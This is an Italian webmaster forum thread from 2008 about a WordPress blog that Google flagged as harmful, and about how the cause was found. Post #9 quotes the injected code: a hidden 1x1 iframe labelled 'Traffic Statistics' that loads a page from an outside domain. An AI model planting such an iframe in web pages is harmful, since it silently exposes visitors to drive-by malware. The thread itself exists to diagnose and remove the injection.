Forum Per Webmaster - Tutti Per Uno  
forum per webmaster Directory TPU foto galleria TPU Registrazione Regolamento TPU FAQ cerca nel forum contatta lo staff Lo staff di TPU

 vai indietro   Forum Per Webmaster - Tutti Per Uno > Internet Marketing > Motori di Ricerca

Motori di Ricerca Discussioni sul posizionamento nei motori di ricerca, SEO e SEM

Rispondi
 
LinkBack Strumenti della discussione Modalità di visualizzazione
  #1 (permalink)  
Vecchio 08-02-2008, 15.11.31
L'avatar di Ludus
Moderatore Inquietante
 
Registrato al forum dal: 20-01-2007
ubicazione: Roma
Messaggi: 4,540
predefinito Malware notification by Google

Avete mai ricevuto email da Google con oggetto "Malware notification regarding nomedominio.ext"?

A me è appena attivata, ma non riesco a capire se si tratta davvero di un email da Google o se sia spam...

I link all'interno puntano a pagine di Google, come questa: google.com/interstitial?url=http%3A//nomedominio.ext/

EDIT: il sito è fatto con WP e l'email non era spam, tanto che nelle serp Google ha aggiunto il seguente sottotitolo: Questo sito potrebbe arrecare danni al tuo computer.

Ora sto mettendo l'ultima versione di WP.
__________________
"Voglio abitare nel posto con la più bassa concentrazione di genere umano".

Contenuti gratis | Recensioni siti | I miei Libri

Ultima modifica di Ludus : 08-02-2008 a 15.38.19.
Rispondi quotando
  #2 (permalink)  
Vecchio 08-02-2008, 15.48.18
L'avatar di EmmeBar
Admin
 
Registrato al forum dal: 19-01-2007
Messaggi: 2,176
Inserzione Blog: 1
Invia un messaggio tremite ICQ a EmmeBar Invia un messaggio tremite AIM a EmmeBar Invia un messaggio tremite MSN a EmmeBar Invia un messaggio tremite Yahoo a EmmeBar Invia un messaggio tremite Skype a EmmeBar
predefinito

E-mail no, ma giusto un paio di giorni fa mi ha precluso l'accesso prendendomi per un bot, magari han qualcosa che non funziona benissimo nei controlli, oppure stan testando qualche nuova diavoleria
__________________
Fotografia Digitale | Viaggi nel Cassetto | Tarocchi

Sei Promosso ? No!? e allora che aspetti per avere anche tu la tua promozione?
Rispondi quotando
  #3 (permalink)  
Vecchio 08-02-2008, 16.14.43
L'avatar di Ludus
Moderatore Inquietante
 
Registrato al forum dal: 20-01-2007
ubicazione: Roma
Messaggi: 4,540
predefinito

Ho messo la versione di WP 2.3.3 e richiesto un controllo a google... vediamo che succede.
__________________
"Voglio abitare nel posto con la più bassa concentrazione di genere umano".

Contenuti gratis | Recensioni siti | I miei Libri
Rispondi quotando
  #4 (permalink)  
Vecchio 08-02-2008, 21.15.26
L'avatar di friskon
Junior Member
 
Registrato al forum dal: 07-03-2007
ubicazione: Naples-Turin
Messaggi: 40
Invia un messaggio tremite MSN a friskon
predefinito

ludus, a me è successo... "senza notifica di email"... che un mio sito aveva nelle ricerche di google : Questo sito potrebbe arrecare danni al tuo computer.

il problema è che non ho mai capito se c'era qualcosa o no... dopo 1 giorno l'han riabilitato tramite mia richiesta...
__________________
Giochi Gratuiti. Directory Blog italiani. Mod Seo.
Rispondi quotando
  #5 (permalink)  
Vecchio 08-02-2008, 22.04.35
L'avatar di Ludus
Moderatore Inquietante
 
Registrato al forum dal: 20-01-2007
ubicazione: Roma
Messaggi: 4,540
predefinito

Quote:
Originariamente inviata da friskon Visualizza il messaggio
ludus, a me è successo... "senza notifica di email"... che un mio sito aveva nelle ricerche di google : Questo sito potrebbe arrecare danni al tuo computer.

il problema è che non ho mai capito se c'era qualcosa o no... dopo 1 giorno l'han riabilitato tramite mia richiesta...
Io ho cercato in tutte le cartelle e non ho trovato roba strana... cmq ho cancellato tutti i file di installazione WP e l'ho aggiornato all'ultima versione, poi ho richiesto il controllo.
__________________
"Voglio abitare nel posto con la più bassa concentrazione di genere umano".

Contenuti gratis | Recensioni siti | I miei Libri
Rispondi quotando
  #6 (permalink)  
Vecchio 09-02-2008, 05.36.28
L'avatar di friskon
Junior Member
 
Registrato al forum dal: 07-03-2007
ubicazione: Naples-Turin
Messaggi: 40
Invia un messaggio tremite MSN a friskon
predefinito

comunque anche avendo quel messaggio, non penso porti danno al posizionamento da come ho visto... (sennò oltre al danno, anche la beffa) comunque ultimamente ne ho visti molti di siti con quel messaggio... diventa sempre più duro internet...
__________________
Giochi Gratuiti. Directory Blog italiani. Mod Seo.
Rispondi quotando
  #7 (permalink)  
Vecchio 09-02-2008, 09.51.35
L'avatar di Ludus
Moderatore Inquietante
 
Registrato al forum dal: 20-01-2007
ubicazione: Roma
Messaggi: 4,540
predefinito

Quote:
Originariamente inviata da friskon Visualizza il messaggio
comunque anche avendo quel messaggio, non penso porti danno al posizionamento da come ho visto...
Al posizionamento no, sono sempre secondo con la sua chiave principale, ma all'immagine il danno lo porta eccome
__________________
"Voglio abitare nel posto con la più bassa concentrazione di genere umano".

Contenuti gratis | Recensioni siti | I miei Libri
Rispondi quotando
  #8 (permalink)  
Vecchio 11-02-2008, 17.21.25
L'avatar di Ludus
Moderatore Inquietante
 
Registrato al forum dal: 20-01-2007
ubicazione: Roma
Messaggi: 4,540
predefinito

Ho trovato un post di Simone che ne parla.

Sono stato sul sito StopBadware.org e ho controllato se i miei siti (nel frattempo anche un altro ha questo problema) fossero ancora nella lista dei pericolosi, e non ci sono.
Bisogna ora aspettare che Google aggiorni...
__________________
"Voglio abitare nel posto con la più bassa concentrazione di genere umano".

Contenuti gratis | Recensioni siti | I miei Libri
Rispondi quotando
  #9 (permalink)  
Vecchio 21-02-2008, 23.01.46
L'avatar di Ludus
Moderatore Inquietante
 
Registrato al forum dal: 20-01-2007
ubicazione: Roma
Messaggi: 4,540
predefinito

Aggiornamento della situazione.

Svelato l'arcano, grazie a Pieru "Sherlock"

E' successo lo stesso anche su un suo sito, ma me ne sono accorto io per caso.

Così Pieru guarda il codice sorgente, cosa che io non avevo fatto nei miei blog... e scopre questo codice sospetto:


codice:
<!-- Traffic Statistics --> <iframe width="1" height="1" frameborder="0" src="http://www.wp-stats-php.info/iframe/wp-stats.php"></iframe> <!-- End Traffic Statistics -->
Così vado a vedere nel mio blog incriminato e lo vedo anche io.

E' proprio in mezzo al post. Basta aprire il post e cancellare quel codice.

Consiglio: se avete un blog con WP... fate un controllo. Basta digitare l'indirizzo nella barra di ricerca di Google e vedere se Google ha messo quella bella frasetta sotto al title: Questo sito potrebbe arrecare danni al tuo computer.
__________________
"Voglio abitare nel posto con la più bassa concentrazione di genere umano".

Contenuti gratis | Recensioni siti | I miei Libri
Rispondi quotando
  #10 (permalink)  
Vecchio 21-02-2008, 23.04.58
L'avatar di pieru
Moderatore globale rivoluzionario
 
Registrato al forum dal: 19-01-2007
ubicazione: Monza
Messaggi: 1,437
Invia un messaggio tremite ICQ a pieru
predefinito

Quote:
Originariamente inviata da Ludus Visualizza il messaggio

E' successo lo stesso anche su un suo sito, ma me ne sono accorto io per caso.
OT: giusto per la precisione: il sito non è mio, ma nostro, cioè mio e suo
__________________


Sono stato in chat con Asia Carrera. Internet è utilissimo, finalmente ho le prove.

Non ho tempo per sanguinare
Il sito di Pieru Article Marketing Metti lo spam alla berlina
Rispondi quotando
Rispondi

Segnalibri

Strumenti della discussione
Modalità di visualizzazione

Regole d'invio
Non puoi inserire discussioni
Non puoi inserire repliche
Non puoi inserire allegati
Non puoi modificare i tuoi messaggi

BB code is attivo
Le smilies sono attive
Il codice IMG è attivo
il codice HTML è disattivato
Trackbacks are attivo
Pingbacks are attivo
Refbacks are attivo


Tutti gli orari sono GMT +2. Attualmente sono le 17.54.09.


Powered by vBulletin versione 3.7.2
Copyright ©: 2000 - 2008, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.2.0 RC7
Traduzione italiana Team: vBulletin-italia.it
Grafica by Ludus